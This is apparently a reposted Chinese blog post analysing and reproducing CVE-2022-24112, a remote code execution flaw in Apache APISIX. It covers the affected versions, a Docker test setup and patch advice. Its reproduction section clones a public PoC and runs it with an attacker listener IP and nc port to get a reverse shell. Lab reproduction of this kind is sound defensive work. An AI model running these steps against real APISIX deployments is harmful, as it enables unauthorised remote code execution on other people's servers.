CVE-2022-24112:Apache APISIX 远程代码执行漏洞分析与复现

admin 2022年4月22日10:29:21评论1,372 views字数 844阅读2分48秒阅读模式
CVE-2022-24112:Apache APISIX 远程代码执行漏洞分析与复现
漏洞概述
Apache Apisix是美国阿帕奇(Apache)基金会的一个云原生的微服务API网关服务。该软件基于 OpenResty etcd 来实现,具备动态路由和插件热加载,适合微服务体系下的 API 管理。

Apache APISIX中存在远程代码执行漏洞,该漏洞源于产品的batch-requests插件未对用户的批处理请求进行有效限制。攻击者可通过该漏洞绕过Admin APIIP限制,容易导致远程代码执行。

CVE-2022-24112:Apache APISIX 远程代码执行漏洞分析与复现
影响版本

Apache APISIX >=2.11.0,<2.12.1

Apache APISIX <2.10.4
CVE-2022-24112:Apache APISIX 远程代码执行漏洞分析与复现
环境搭建

(1)本次使用docker搭建本地测试环境进行复现:

git clone https://github.com/twseptian/cve-2022-24112cd cve-2022-24112/apisix-docker/example/docker-compose -p docker-apisix up -d

CVE-2022-24112:Apache APISIX 远程代码执行漏洞分析与复现

(2)服务启动后,访问http://your-ip:8080即可看到演示页面

CVE-2022-24112:Apache APISIX 远程代码执行漏洞分析与复现

(3)默认管理员用户名及密码为admin/admin,可登录管理后台

CVE-2022-24112:Apache APISIX 远程代码执行漏洞分析与复现
漏洞复现
获取POC进行漏洞攻击:
git clone https://github.com/twseptian/cve-2022-24112cd cve-2022-24112/poc/chmod +x poc2.py#用法:python3 poc2.py -t [本地测试IP] -p [服务端口] -L [docker通信IP] -P [nc监听端口]python3 poc2.py -t 127.0.0.1 -p 9080 -L 192.168.150.188 -P 8888

CVE-2022-24112:Apache APISIX 远程代码执行漏洞分析与复现

CVE-2022-24112:Apache APISIX 远程代码执行漏洞分析与复现
处置建议

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

https://lists.apache.org/thread/lcdqywz8zy94mdysk7p3gfdgn51jmt94


CVE-2022-24112:Apache APISIX 远程代码执行漏洞分析与复现


CVE-2022-24112:Apache APISIX 远程代码执行漏洞分析与复现

原文始发于微信公众号(第59号):CVE-2022-24112:Apache APISIX 远程代码执行漏洞分析与复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月22日10:29:21
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2022-24112:Apache APISIX 远程代码执行漏洞分析与复现http://cn-sec.com/archives/933555.html

发表评论

匿名网友 填写信息